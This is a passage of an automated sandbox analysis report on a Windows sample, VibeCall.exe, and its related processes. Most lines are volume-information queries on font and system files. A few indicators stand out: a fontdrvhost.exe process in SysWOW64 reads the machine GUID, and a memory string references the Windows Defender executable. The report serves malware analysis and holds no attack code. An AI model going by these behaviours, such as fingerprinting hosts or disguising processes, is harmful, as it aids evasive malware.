                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_3_01767C40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_3_01767C40
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: VibeCall.exe, 00000000.00000003.2363143825.000002192559B000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2364290703.000002192559B000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2365524725.000002192559B000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.2365903581.000002192B148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
